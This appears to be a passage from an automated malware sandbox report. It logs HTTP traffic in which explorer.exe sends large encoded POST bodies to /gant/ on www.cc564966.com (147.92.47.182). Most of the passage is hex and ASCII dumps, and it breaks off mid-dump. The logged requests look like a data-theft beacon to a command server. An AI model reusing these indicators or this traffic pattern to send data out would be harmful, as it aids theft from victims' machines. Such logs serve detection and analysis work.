                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Set-Cookie: SESSION=1fce4719-f864-4d77-9014-2d4ddd297388; Path=/; HttpOnly; SameSite=Lax
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 34 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 55 4b 8f e3 44 10 3e 67 7e 45 e3 d5 68 67 20 1e 3b 99 64 1e 1e 27 52 9e bb 21 3b c9 ce e4 b1 64 10 87 8e dd b1 5b b1 dd a6 dd ce 63 56 48 2b 0e 88 0b 07 6e 48 3c 24 38 71 41 e2 b2 d2 0a c4 af 61 22 e0 5f d0 dd 76 66 3c 68 58 41 12 3b ee aa ea aa af be 2a 57 9b ef 34 fb 8d e1 e4 79 0b 3c 1d 9e 3f 03 cf 47 f5 67 9d 06 50 54 4d 7b 71 d8 d0 b4 e6 b0 99 28 4a 07 7a 01 0c 29 0c 22 cc 30 09 a0 a7 69 ad 9e 52 dd 31 5d e6 7b e2 0f 41 bb ba 93 33 7d c4 20 70 19 0b 55 f4 71 8c 17 15 a5 41 02 86 02 a6 0e d7 21 52 80 95 ac 2a 0a 43 2b a6 89 bd 67 c0 72 21 8d 10 ab 8c 86 6d f5 44 01 5a 75 07 f0 8f c9 30 f3 50 b5 a4 97 d4 3f 7e fb 72 f3 ed ab 9b 37 5f 6c 7e fa 6a f3 cd 8f a6 96 a8 76 72 db 78 01 f4 51 45 a1 64 4a 58 94 89 11 90 19 f1 3c b2 e4 30 1f 00 16 52 e8 f8 f0 9e b9 6a 41 cb 45 0f 9b 4b 95 2a f0 53 e2 fd e7 5d 68 15 62 8a b2 a0 f4 87 dd cf d1 7a 49 a8 9d b5 4c 45 85 7c fa 50 dc 3e 1c 3e ec c2 46 91 45 71 28 ca 93 c1 37 74 71 04 f8 cf 5f 83 10 3a 32 39 ce 46 c4 d6 9c dc 9d 5c ee dd 97 fc 96 f3 21 75 70 60 e8 67 62 11 42 db c6 81 93 ac 3e e1 92 29 b1 d7 d2 6c c6 b3 57 67 d0 c7 de da 00 8f 6b b1 8d c9 12 db e8 71 1e 58 31 8d f0 02 e5 01 a4 18 7a 79 e0 22 6f 81 18 b6 60 1e 44 bc 67 d4 08 51 3c 93 de a7 d0 9a 3b 94 c4 81 6d c4 d4 db b3 21 83 06 f6 39 32 2d 0c 9c b3 29 8c d0 51 29 8f c7 f5 fe e5 52 ef 3e 71 48 8d 7f 7a 83 91 db 1a 39 e2 51 ae bb 8d da 84 3f 37 7a e7 d1 7b a7 42 3a 6a 79 ad 8b f1 c5 64 5c ec cd 27 4f 6a cb 7a dc bd be a8 2d 9b 9d 66 a9 43 3a ce aa 83 e7 b5 f3 ab 56 81 5c e2 1a ad 37 ed ab fa a0 77 de f9 80 bc 8f db d3 e6 d5 a4 d9 b5 06 7e a3 3f c1 7e 33 ee 0d c6 dd ce f5 65 6f 42 47 93 7e 3b be 70 96 88 5c 4d 3b 64 e5 10 c4 83 5b b5 96 35 7f 51 28 3c 1d 0f 67 96 08 5d 1b 8c c6 fd cb 6e b9 31 e9 74 2a fb 80 a2 10 41 f6 8f 4c 79 db 78 84 1a 8f 8a 05 f1 95 ca 44 b2 74 31 43 72 2d a9 8d f0 35 32 40 e1 24 5c 49 59 5a 08 95 b7 35 23 be 51 d4 13 b9 28 c9 01 a2 94 50 ee d7 46 2f 45 cd ee 57 a6 41 11 0a 23 86 e8 ff aa 4c 06 42 51 4f 63 e5 12 9c e0 0e 68 2a a0 ce 14 ee 15 cb e5 3c b8 bb e9 07 a7 27 fb 12 39 ef 0a e6 1a a0 ac ef ca a5 78 d9 55 e8 61 27 30 00 c5 8e 9b f0 93 34 9d ca 48 c8 2d 33 86 91 0b 6d b2 e4 b2 70 25 2f 37 f2 f6 f4 3c d0 77 45 ac dd 24 c0 cc 23 90 19 c0 43 33 e9 4b 52 12 10 de 9c a2 b1 24 23 29 84 d2 71 e2 39 dd f0 d6 e8 19 02 ca ff 9a bf cc 65 0b b1 c8 21 8a 4b 40 cd c0 3c 2a a4 30 b7 15 94 39 1e 67 eb 67 79 08 d2 a4 74 32 95 80 04 49 23 48 85 c1 4b ee 0a ea 64 62 e9 d0 94 d6 19 2a 2d 3e 56 11 15 56 39 0f 07 48 75 91 a0 d6 00 87 99 38 38 08 63 f6 21 e3 b3 b7 22 76 7e 24 7d 4c f9 a0 41 d4 90 88 8b a5 e3 3c 38 39 e5 dc 1e 17 77 f7 41 44 3c 6c 83 42 da 80 24 66 c2 b3 01 6e d1 6d 67 83 cc f8 30 35 cb f0 56 38 4a 65 49 0c 95 42 1b c7 91 01 d2 96 16 e9 c0 bb 3c 6c 64 11 0a c5 c0 ca 84 48 1b ec d1 69 ab d1 6c b7 65 7a f7 38 e7 d9 01 71 09 de 6f db 52 3a 36 5c b2 40 09 a9 89 93 8c 9a cf 3c 2d 1d 7a a6 96 1c 56 a6 98 6b 7c 06 72 55 08 2c 0f 46 51 45 b9 7b ad c4 8c cd f1 d3 47 6c 0c c5 01 72 6b
                                                                                                                  Data Ascii: 446UKD>g~Ehg ;d'R!;d[cVH+nH<$8qAa"_vf<hXA;*W4y<?GgPTM{q(Jz)"0iR1]{A3} pUqA!R*C+gr!mDZu0P?~r7_l~jvrxQEdJX<0RjAEK*S]hbzILE|P>>FEq(7tq_:29F\!up`gbB>)lWgkqX1zy"o`DgQ<;m!92-)Q)R>qHz9Q?7z{B:jyd\'Ojz-fC:V\7w~?~3eoBG~;p\M;d[5Q(<g]n1t*ALyxDt1Cr-52@$\IYZ5#Q(PF/EWA#LBQOch*<'9xUa'04H-3mp%/7<wE$#C3KR$#)q9e!K@<*09ggyt2I#HKdb*->VV9Hu88c!"v~$}LA<89wAD<lB$fnmg05V8JeIB<ldHilez8qoR:6\@<-zVk|rU,FQE{Glrk
                                                                                                                  Feb 13, 2023 19:02:27.666750908 CET1002INData Raw: 73 db 67 4a b5 47 98 39 a5 5a b5 2d da 2e b5 b3 f1 62 eb 4d d6 52 a9 9a 1a 97 09 17 59 55 72 10 6e a3 88 33 ee af ef 5f ff f9 fa e7 9b 37 3f dc fc f2 d9 ef af 3e e5 e1 a5 6f 93 9f a7 14 cd 2a 8a a6 54 37 5f 7f b7 f9 9c 9b fc ca 6d 4d 0d 0a 9f 89
                                                                                                                  Data Ascii: sgJG9Z-.bMRYUrn3_7?>o*T7_mMoSKo0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  41192.168.11.2049887147.92.47.18280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:30.171053886 CET1005OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.cc564966.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.cc564966.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.cc564966.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 74 76 4f 52 50 4e 4a 7a 51 4b 54 5a 6e 75 53 62 41 33 68 48 4f 67 55 75 32 70 77 44 48 42 4f 74 7e 6b 78 4b 43 43 4a 4a 79 4d 5a 62 72 2d 41 2d 56 49 7a 68 77 54 68 38 66 77 68 6d 54 69 4d 6a 62 71 47 51 75 73 4f 37 73 54 53 2d 4c 63 47 48 72 41 44 4d 56 74 38 50 78 47 41 59 74 79 30 39 79 32 57 66 41 78 6f 64 65 51 4c 41 6d 78 72 4a 75 52 4e 45 4a 46 39 34 45 58 48 63 44 67 42 48 38 37 4c 56 64 68 58 33 59 7a 36 46 39 58 61 4b 44 49 68 77 37 5f 5a 76 38 78 68 39 4e 65 4e 4b 6a 32 77 56 36 68 35 72 30 61 28 75 68 64 4d 69 76 6b 36 49 28 75 62 70 62 56 32 41 44 75 67 64 51 36 74 38 66 33 76 73 34 54 68 56 4a 4e 52 50 35 67 6a 50 53 63 30 61 65 43 52 71 32 34 6c 30 69 31 41 36 55 57 4e 72 36 45 7a 45 54 37 37 6b 30 70 7a 33 31 44 4b 47 7a 5a 7e 4e 28 51 44 70 7a 35 41 4c 6c 76 52 6b 6e 46 43 66 6b 50 44 5a 46 72 37 4e 67 77 78 52 6a 32 41 56 6f 7a 38 79 49 45 36 38 57 35 75 77 4b 71 33 5a 57 75 65 57 79 4d 70 39 4c 41 30 71 31 62 70 46 48 78 62 53 4c 46 37 72 35 38 5a 78 34 73 54 79 6b 68 31 42 6d 37 36 42 65 51 45 73 30 47 33 43 46 56 51 51 6e 30 31 50 46 53 78 70 74 6f 62 65 69 6b 63 4a 41 6b 44 69 63 31 38 57 36 72 66 44 39 5f 4d 37 73 72 28 69 6b 4b 41 43 28 34 43 64 75 71 57 52 57 2d 50 62 67 4a 64 6f 28 79 6b 75 35 63 67 51 75 68 6d 58 41 46 5a 75 48 6a 70 52 62 64 4d 7a 4b 4f 61 35 6b 32 65 72 6e 36 44 72 59 31 35 42 4b 58 4f 50 43 31 31 79 54 50 56 4e 71 33 6c 68 53 4b 4e 2d 45 36 76 65 57 77 6c 6d 6a 47 33 71 51 37 36 33 35 62 49 4e 51 59 7a 69 79 4c 6e 63 33 2d 50 41 74 5a 69 67 44 55 78 39 6e 63 47 44 43 37 73 63 45 68 53 73 75 78 77 6b 65 4d 76 6c 48 67 45 35 4f 5a 69 66 28 72 7a 63 49 58 49 2d 78 5a 57 68 28 6e 4c 45 50 68 48 4f 47 36 6b 35 61 32 44 61 48 62 31 61 39 48 5a 4c 54 77 78 61 30 6c 4a 63 51 63 79 55 51 77 49 63 32 74 6b 35 4f 6d 33 42 51 62 28 39 41 57 5a 36 66 5a 56 4c 42 43 34 76 4d 6f 4d 68 66 6f 41 45 50 72 74 75 4d 73 66 56 50 7a 37 6b 36 76 71 5f 44 69 6e 6a 7e 44 65 79 44 4f 48 2d 74 65 52 62 39 34 4a 54 45 79 34 41 28 36 4a 4b 56 63 50 72 79 6c 6d 6a 4f 77 69 74 63 5a 30 6b 6d 59 7e 77 79 55 45 50 63 76 41 53 62 49 4e 6e 4a 73 75 35 6e 45 68 4f 51 4a 55 56 57 59 7e 35 41 70 45 5f 79 45 71 2d 66 65 62 6c 77 32 51 68 36 66 6c 49 35 67 71 70 50 6c 7e 32 33 45 5a 79 6b 65 76 6c 66 41 41 37 4f 4a 5a 74 4f 32 4f 4b 68 44 32 43 37 6a 41 34 53 44 48 68 71 73 49 4e 54 53 46 6c 78 57 6b 51 47 4a 42 6a 49 49 35 4e 33 50 4e 5f 59 6d 6e 66 31 50 77 56 31 35 4c 59 77 30 48 4d 4a 54 48 79 69 6d 70 70 78 43 6c 6b 31 4c 62 53 77 69 28 6f 61 56 50 7a 6b 6f 5a 5f 76 67 37 71 6b 59 31 69 47 69 46 51 47 57 58 53 69 68 75 77 48 51 50 59 72 32 64 6f 54 39 6e 44 6b 69 68 48 61 68 50 68 6b 79 6e 6c 54 43 6d 50 37 75 54 39 77 73 73 39 32 4d 76 6f 6c 41 46 69 4a 72 46 71 52 4c 64 39 51 59 70 71 55 5a 63 30 69 56 4f 33 38 6d 68 72 43 71 34 45 47 64 46 74 52 42 33 63 6f 54 71 38 79 71 5a 69 6e 70 74 51 59 61 61 6c 28 5a 67 6d 45 45 48 6a 65 53 34 6b 4b 78 44 46 7a 63 75 42 41 41 70 6d 43 31 50 31 45 37 67 6d 30 44 37 6c 45 43 41 67 6f 37 71 70 4b 77 44 6e 6f 7a 38 32 73 77 5a 30 49 34 62 30 6d 53 48 46 47 2d 43 78 61 44 55 4a 41 49 35 4e 7a 31 47 79 52 47 64 69 48 55 43 79 6b 44 59 75 68 61 4a 36 6f 73 49 63 71 4d 38 72 75 45 42 39 6c 4b 49 6b 64 46 4e 38 38 5a 4e 36 62 31 71 39 74 74 43 44 57 41 66 46 6c 37 49 45 5a 74 70 61 79 49 67 72 34 72 59 56 36 77 6b 65 71 4c 75 38 53 38 6c 36 44 42 59 57 39 78 57 53 57 7a 41 35 52 2d 28 59 33 77 46 53 57 6b 71 47 4d 79 76 53 65 30 38 33 75 4c 56 68 4d 5a 52 5f 75 6f 69 61 33 59 73 57 56 50 53 78 30 79 31 4e 47 57 6f 53 66 58 64 6a 7a 57 6d 68 42 52 78 67 34 69 56 45 72 64 73 4a 6b 55 45 63 28 46 37 73 46 68 4d 6d 41 46 4d 37 44 56 6b 73 51 71 45 76 6d 55 4e 41 6f 67 4b 6d 6e 57 41 56 47 65 43 70 37 57 33 6a 31 62 57 6d 74 36 33 50 50 59 4a 30 6e 33 6b 63 76 7a 65 4d 4a 74 44 47 4b 6e 4b 4b 72 38 52 75 30 4b 6c 69 44 51 50 47 6d 55 38 59 56 67 79 72 44 71 4e 61 58 77 44 77 28 70 6b 78 47 68 5a 31 57 5a 66 64 41 6d 65 2d 7a 4e 4b 66 28 79 78 52 28 44 6d 36 4b 55 35 47 70 4a 4c 33 75 4b 4d 48 6c 2d 72 52 59 72 35 30 44 50 54 45 38 37 44 6d 74 42 74 58
                                                                                                                  Data Ascii: j-Jh9P=tvORPNJzQKTZnuSbA3hHOgUu2pwDHBOt~kxKCCJJyMZbr-A-VIzhwTh8fwhmTiMjbqGQusO7sTS-LcGHrADMVt8PxGAYty09y2WfAxodeQLAmxrJuRNEJF94EXHcDgBH87LVdhX3Yz6F9XaKDIhw7_Zv8xh9NeNKj2wV6h5r0a(uhdMivk6I(ubpbV2ADugdQ6t8f3vs4ThVJNRP5gjPSc0aeCRq24l0i1A6UWNr6EzET77k0pz31DKGzZ~N(QDpz5ALlvRknFCfkPDZFr7NgwxRj2AVoz8yIE68W5uwKq3ZWueWyMp9LA0q1bpFHxbSLF7r58Zx4sTykh1Bm76BeQEs0G3CFVQQn01PFSxptobeikcJAkDic18W6rfD9_M7sr(ikKAC(4CduqWRW-PbgJdo(yku5cgQuhmXAFZuHjpRbdMzKOa5k2ern6DrY15BKXOPC11yTPVNq3lhSKN-E6veWwlmjG3qQ7635bINQYziyLnc3-PAtZigDUx9ncGDC7scEhSsuxwkeMvlHgE5OZif(rzcIXI-xZWh(nLEPhHOG6k5a2DaHb1a9HZLTwxa0lJcQcyUQwIc2tk5Om3BQb(9AWZ6fZVLBC4vMoMhfoAEPrtuMsfVPz7k6vq_Dinj~DeyDOH-teRb94JTEy4A(6JKVcPrylmjOwitcZ0kmY~wyUEPcvASbINnJsu5nEhOQJUVWY~5ApE_yEq-feblw2Qh6flI5gqpPl~23EZykevlfAA7OJZtO2OKhD2C7jA4SDHhqsINTSFlxWkQGJBjII5N3PN_Ymnf1PwV15LYw0HMJTHyimppxClk1LbSwi(oaVPzkoZ_vg7qkY1iGiFQGWXSihuwHQPYr2doT9nDkihHahPhkynlTCmP7uT9wss92MvolAFiJrFqRLd9QYpqUZc0iVO38mhrCq4EGdFtRB3coTq8yqZinptQYaal(ZgmEEHjeS4kKxDFzcuBAApmC1P1E7gm0D7lECAgo7qpKwDnoz82swZ0I4b0mSHFG-CxaDUJAI5Nz1GyRGdiHUCykDYuhaJ6osIcqM8ruEB9lKIkdFN88ZN6b1q9ttCDWAfFl7IEZtpayIgr4rYV6wkeqLu8S8l6DBYW9xWSWzA5R-(Y3wFSWkqGMyvSe083uLVhMZR_uoia3YsWVPSx0y1NGWoSfXdjzWmhBRxg4iVErdsJkUEc(F7sFhMmAFM7DVksQqEvmUNAogKmnWAVGeCp7W3j1bWmt63PPYJ0n3kcvzeMJtDGKnKKr8Ru0KliDQPGmU8YVgyrDqNaXwDw(pkxGhZ1WZfdAme-zNKf(yxR(Dm6KU5GpJL3uKMHl-rRYr50DPTE87DmtBtXwLLKknsdp1EOUnOcHwr6VmRCnRFo4m6gqH6eIN20yVJ7vloN2Xjq4sbFOEMUHnkt2gIcL0UmM1hDh-BySy9v8yIYiNnsh8nFD9htkffleGQZJT(1QDplhJen1WvAvZIwCwGJWUdOvRRcn4EyinB4v4aur5dTjOy6it8_F-AA92pDdoaVSDPxwVZ_lZTX0D41LH8ohqOiEEJC76anrOf2(2uz1utGmQavnZlknnK0vzPDRYWuIFJJjw(f8fwV4Jssoyo7u1SeXKhARrVWhuRLDox-pVqs0I~5(WkxLoFwLu0Lq-u8JgugvJp4fcqr6lPd00R0VEhvtA0Vb-YU126YyadPBCIZT3uWVkjFeKz2tkWM1H0vm6iftLG9Wv8-ElhC(3l2eExQtOD_fuodvSUQhKjMrgIEMsl98JCfVZzyP7nTpeg4qTmPt949iYlw6Rjil-4gSDz0CV2SYfO-9X(OqkW3kxo7VUJSg3QSnf6EIDrr~BYPF3rwGOb1EEFLIME8MYQbXkEfKREjj8v_cdt_0SKmXW8_n5rGgdpFDhAQvj7UjS6TqQkJS6i6MVhLyaPDbgngih7RKhgbFzAxkYU1Tkls31tfXhEr(Fpr7-ztUnUcODiIoSdHZm1Usv2j47nz36Qe4JapXGcBu0H9(3g1TMrKyTKsh_fLGCTwAFStzZZ0G5exqTbq03T1BfODBQoLgucGMiar8ToZAi0bjFZPRK2p621qjMkdX80s4epo7UC6SGGZEnNJ9hFK61qqSJfyt4Bytn(gI7Vrvs3gS7YMGg11s6uHtxr6SO(6YGW2AJE61m8
                                                                                                                  Feb 13, 2023 19:02:30.171122074 CET1014OUTData Raw: 6b 36 32 52 5a 48 51 4d 39 74 63 52 77 68 51 57 37 52 77 73 56 4d 56 28 79 49 36 28 73 7e 66 41 52 31 6a 68 51 6a 77 78 32 5a 71 5a 44 44 77 73 64 66 53 48 4d 44 62 6c 6a 50 76 69 31 32 55 42 42 33 47 54 41 62 74 67 5f 47 30 30 4c 70 52 59 61 67
                                                                                                                  Data Ascii: k62RZHQM9tcRwhQW7RwsVMV(yI6(s~fAR1jhQjwx2ZqZDDwsdfSHMDbljPvi12UBB3GTAbtg_G00LpRYagdya3HT440F6aqlKYddVqtjmUpZP~ztwHjJrPtTdwrbIcy1nOL12K6RxDSpJmmya7Wt48AGwLi4sgXQaJB(7MOA19iAGqGj71qOAYlry14Woadn7(UgSty8yFv2G2q4yu5VwDH(LKKBHMW2xKPO-EqKwuFy1vQClf7
                                                                                                                  Feb 13, 2023 19:02:30.171160936 CET1015OUTData Raw: 72 78 47 6b 63 47 32 38 78 50 64 45 4c 28 4c 7e 42 47 32 6f 55 6f 78 68 55 43 4c 68 33 4d 46 4c 4f 54 5f 73 44 70 6a 59 69 57 35 54 4a 69 47 38 35 69 4d 64 35 49 5a 63 44 77 68 64 44 48 64 64 76 34 75 41 66 53 66 6d 6c 6e 6a 75 35 46 6c 31 33 39
                                                                                                                  Data Ascii: rxGkcG28xPdEL(L~BG2oUoxhUCLh3MFLOT_sDpjYiW5TJiG85iMd5IZcDwhdDHddv4uAfSfmlnju5Fl139isy0BeAuo~gIZSxloNOzD4kBioEhdR9bJMSew7fgvmjfNJEcmV8oYFCsQyrWqq-zKqNGTMJR0CqWoVqFilXrNOv5F1Wkido(OC-k68l0uiquIZH~wBkXmrXY7IDplMDSg4G2A5bzn4_KJ3wTMj12v7WXCUpqOsB0f
                                                                                                                  Feb 13, 2023 19:02:30.438739061 CET1016OUTData Raw: 43 45 34 52 58 52 59 55 75 4e 77 47 71 64 5f 64 37 6c 70 55 61 4d 35 75 79 33 49 31 36 5a 44 6e 38 77 36 65 5f 5a 42 7a 62 68 64 36 30 4a 53 57 44 33 7a 42 39 30 2d 45 43 54 54 70 68 76 6b 73 6a 65 6b 77 53 34 71 57 69 6f 68 56 4e 58 59 6c 41 74
                                                                                                                  Data Ascii: CE4RXRYUuNwGqd_d7lpUaM5uy3I16ZDn8w6e_ZBzbhd60JSWD3zB90-ECTTphvksjekwS4qWiohVNXYlAtdWFsbDXH1NKjj8i3_M2mqqG71uWSIh5Jn9e6pM3jd~cKlZqJ1CQkaL4Xn1eK2dXx4LzsCjbKSgFYjpHVpDxYR4XET7dxEpaHWgsIuTy09Km2m5RjMdetmYEqazinID0y1kZV2cW7hQEmGRQlxfmcGgSPJiX39XMm1
                                                                                                                  Feb 13, 2023 19:02:30.438817024 CET1023OUTData Raw: 69 56 41 39 79 33 52 51 39 5a 76 66 76 52 59 46 4c 35 50 37 64 70 46 36 73 65 6c 57 45 43 77 4c 6a 41 71 4c 31 36 36 56 51 5a 4c 56 67 55 69 38 6c 4b 35 47 52 62 6a 66 76 62 64 6f 44 6a 37 4d 74 6f 4b 4b 70 50 78 75 30 69 67 4c 37 42 30 62 61 67
                                                                                                                  Data Ascii: iVA9y3RQ9ZvfvRYFL5P7dpF6selWECwLjAqL166VQZLVgUi8lK5GRbjfvbdoDj7MtoKKpPxu0igL7B0bag78_(rtfr-8Dli8LoYjSzBqr7Y8FwYXoGCrJJ9iRL-K6ml9JhXcskvBUbYkFI0IAW9IUb5q_PlDEXwbSaYZjuVIdSXPcP3vfM6hpau(fF3wh0QP2MZBPI8lDNsx3WYDHj3r3PpDSQPyXoiJjcUsjW7V-4ZNAd8p4(H
                                                                                                                  Feb 13, 2023 19:02:30.439210892 CET1028OUTData Raw: 58 79 4f 55 5a 30 61 76 6c 6e 31 37 62 78 43 63 79 73 32 43 2d 57 53 6a 2d 74 49 74 45 76 50 5a 7a 44 70 36 7a 6e 75 6c 6f 70 59 42 68 47 61 37 45 70 35 61 45 59 66 4c 56 30 73 6e 78 79 39 38 66 79 38 7a 78 45 37 73 4f 54 30 39 4f 62 64 5a 62 58
                                                                                                                  Data Ascii: XyOUZ0avln17bxCcys2C-WSj-tItEvPZzDp6znulopYBhGa7Ep5aEYfLV0snxy98fy8zxE7sOT09ObdZbXwQUB5ms~q(qU33jYL(xX4BQEZqR0RddVkiDrDm1W0aV0UkpFb6tsGVrIz1rqQguj8lLK2F2xMMrc7DT(q(VzzIsTayEib7DWrvHgtkZcm~BJDGEhGjWA_nYJ7sW65J2qdxxwile29DwKoOJCFEKKdrgtyJf0YJGOj
                                                                                                                  Feb 13, 2023 19:02:30.439457893 CET1029OUTData Raw: 4b 6e 77 46 35 70 37 72 47 4f 77 66 52 6a 62 34 48 67 74 61 6c 6b 6d 47 76 43 4d 79 56 50 74 62 64 4b 4a 6b 38 34 56 67 78 7a 33 67 6b 6c 36 52 61 4b 68 71 38 7a 70 30 33 51 79 6f 48 56 6a 4e 50 58 45 28 44 4a 5a 62 4e 32 36 51 52 36 50 53 78 77
                                                                                                                  Data Ascii: KnwF5p7rGOwfRjb4HgtalkmGvCMyVPtbdKJk84Vgxz3gkl6RaKhq8zp03QyoHVjNPXE(DJZbN26QR6PSxwg1doZt3R_346LBGCvlRcqOMdYyu8ayyusriMLYWL1v99Z93ay233uICcbvNbKT0clzysLCj4E4j2FSsAe9TB4f5sOgls9gq~fhrPlDRzWJclilnlX5JD-iB4n4-e2BoXoSjPjPyxZkVKmtmfqUMFO5czzRS6n~T7o
                                                                                                                  Feb 13, 2023 19:02:30.439559937 CET1038OUTData Raw: 30 4e 30 55 62 78 4a 32 41 48 38 64 42 39 54 67 63 47 46 51 75 49 57 7e 6c 44 46 4a 6c 54 52 4f 34 55 6d 36 59 6e 30 51 63 59 48 39 45 74 6f 50 61 35 55 32 47 36 4d 77 33 49 57 33 74 48 78 6c 5f 28 4d 68 44 45 50 4a 6e 54 54 73 7a 30 6e 65 52 61
                                                                                                                  Data Ascii: 0N0UbxJ2AH8dB9TgcGFQuIW~lDFJlTRO4Um6Yn0QcYH9EtoPa5U2G6Mw3IW3tHxl_(MhDEPJnTTsz0neRaBE0JRIWveSqqTvlgFs1VRO9XzbK2QsLKORzuSZgfCG1dIG5ZVWQ883rOKpl(jwtXJ0KSBkPzsEZ0By3gvHxhENmjDdlTgQ0zC5oXzBRPV5lQTawffpvhaL_zwB-ad7WeUP4cV8bi9Nm0hSjikGA5_qLdLyXI-hC3J
                                                                                                                  Feb 13, 2023 19:02:30.439613104 CET1041OUTData Raw: 76 6a 6b 42 30 52 48 34 53 72 68 5a 55 67 4d 4e 57 69 39 51 68 50 4e 4e 33 4c 42 52 4c 38 50 55 5a 46 37 53 39 6d 7a 71 69 76 72 46 55 47 36 53 7a 58 55 42 6f 32 36 4d 2d 6d 46 51 39 43 50 63 33 39 35 49 58 6f 74 68 50 4d 65 4a 30 32 4a 55 57 6e
                                                                                                                  Data Ascii: vjkB0RH4SrhZUgMNWi9QhPNN3LBRL8PUZF7S9mzqivrFUG6SzXUBo26M-mFQ9CPc395IXothPMeJ02JUWnDbuCYmp3auzyOonB5o6r31Qn3s_WHvTUlqTUA5ek1F1FOjMxUhzqwprv9JGrpcDPSmhta8He-7qXwnnMc2Z36SX7SvL26(sQ2u2gdoHGoSOmA8119GTs6uXYITneezpxea5PLoM4uSTJQtNYBoSg8SZ5rLFKcf6Qo
                                                                                                                  Feb 13, 2023 19:02:30.706322908 CET1047OUTData Raw: 7a 45 33 65 79 54 39 51 5f 37 57 63 35 32 42 45 44 61 75 4e 69 35 41 56 6e 77 48 43 44 62 32 75 67 6f 4a 49 59 50 46 4e 42 7e 46 74 50 38 46 51 42 4a 5a 72 5a 46 49 32 59 61 56 55 6b 4a 52 77 4e 43 45 74 6a 4f 52 28 79 53 77 6c 78 76 50 37 44 62
                                                                                                                  Data Ascii: zE3eyT9Q_7Wc52BEDauNi5AVnwHCDb2ugoJIYPFNB~FtP8FQBJZrZFI2YaVUkJRwNCEtjOR(ySwlxvP7DbxUqvLH1m1TbfwOGSpNrgdW-EtstZOoONnU0Bfd8Bsc7fzvTy_C5iGJXdmFsdSqXNKcalo2heDR5TffrpOzRgp9nnTlhMrYjR7KXqsltvwz69d(n2JpBLYONbe1Ggsb7pWHWZo2TGM2j2G9uPOArjf0w2QlmNJXA3P
                                                                                                                  Feb 13, 2023 19:02:30.706403017 CET1048OUTData Raw: 32 44 36 51 39 34 34 68 79 63 47 65 6a 33 66 6b 69 55 6d 6b 71 6f 32 62 76 61 48 54 30 39 46 79 71 43 4d 6a 54 77 65 6d 66 43 77 4c 4f 44 7a 6b 54 44 59 65 52 5a 53 79 4a 4e 42 56 78 72 4e 4f 55 58 56 48 38 43 36 54 57 41 77 75 33 49 42 78 32 59
                                                                                                                  Data Ascii: 2D6Q944hycGej3fkiUmkqo2bvaHT09FyqCMjTwemfCwLODzkTDYeRZSyJNBVxrNOUXVH8C6TWAwu3IBx2YOFdrD(6IwhrrhRQqBJgLSFLLjAvD1T1wLEfPK(id-qM0LVKQCtvG0xV93eSU0KGrgQm(eY4XSZQajsd2EyqzfN7zZ9xdrrfWK3eRfWhyV0tsOIMH4PqgW(T0HuKG16NLF5k5gFJrP2E9cv7TfIoqJjDFq0x9Djdix
                                                                                                                  Feb 13, 2023 19:02:31.003432035 CET1056INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:02:30 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Set-Cookie: SESSION=08a9e45f-f8a1-4452-b0a7-a7b8914c1d87; Path=/; HttpOnly; SameSite=Lax
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 34 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 55 4b 8f e3 44 10 3e 67 7e 45 e3 d5 68 67 20 1e 3b 99 64 1e 1e 27 52 9e bb 21 3b c9 ce e4 b1 64 10 87 8e dd b1 5b b1 dd a6 dd ce 63 56 48 2b 0e 88 0b 07 6e 48 3c 24 38 71 41 e2 b2 d2 0a c4 af 61 22 e0 5f d0 dd 76 66 3c 68 58 41 12 3b ee aa ea aa af be 2a 57 9b ef 34 fb 8d e1 e4 79 0b 3c 1d 9e 3f 03 cf 47 f5 67 9d 06 50 54 4d 7b 71 d8 d0 b4 e6 b0 99 28 4a 07 7a 01 0c 29 0c 22 cc 30 09 a0 a7 69 ad 9e 52 dd 31 5d e6 7b e2 0f 41 bb ba 93 33 7d c4 20 70 19 0b 55 f4 71 8c 17 15 a5 41 02 86 02 a6 0e d7 21 52 80 95 ac 2a 0a 43 2b a6 89 bd 67 c0 72 21 8d 10 ab 8c 86 6d f5 44 01 5a 75 07 f0 8f c9 30 f3 50 b5 a4 97 d4 3f 7e fb 72 f3 ed ab 9b 37 5f 6c 7e fa 6a f3 cd 8f a6 96 a8 76 72 db 78 01 f4 51 45 a1 64 4a 58 94 89 11 90 19 f1 3c b2 e4 30 1f 00 16 52 e8 f8 f0 9e b9 6a 41 cb 45 0f 9b 4b 95 2a f0 53 e2 fd e7 5d 68 15 62 8a b2 a0 f4 87 dd cf d1 7a 49 a8 9d b5 4c 45 85 7c fa 50 dc 3e 1c 3e ec c2 46 91 45 71 28 ca 93 c1 37 74 71 04 f8 cf 5f 83 10 3a 32 39 ce 46 c4 d6 9c dc 9d 5c ee dd 97 fc 96 f3 21 75 70 60 e8 67 62 11 42 db c6 81 93 ac 3e e1 92 29 b1 d7 d2 6c c6 b3 57 67 d0 c7 de da 00 8f 6b b1 8d c9 12 db e8 71 1e 58 31 8d f0 02 e5 01 a4 18 7a 79 e0 22 6f 81 18 b6 60 1e 44 bc 67 d4 08 51 3c 93 de a7 d0 9a 3b 94 c4 81 6d c4 d4 db b3 21 83 06 f6 39 32 2d 0c 9c b3 29 8c d0 51 29 8f c7 f5 fe e5 52 ef 3e 71 48 8d 7f 7a 83 91 db 1a 39 e2 51 ae bb 8d da 84 3f 37 7a e7 d1 7b a7 42 3a 6a 79 ad 8b f1 c5 64 5c ec cd 27 4f 6a cb 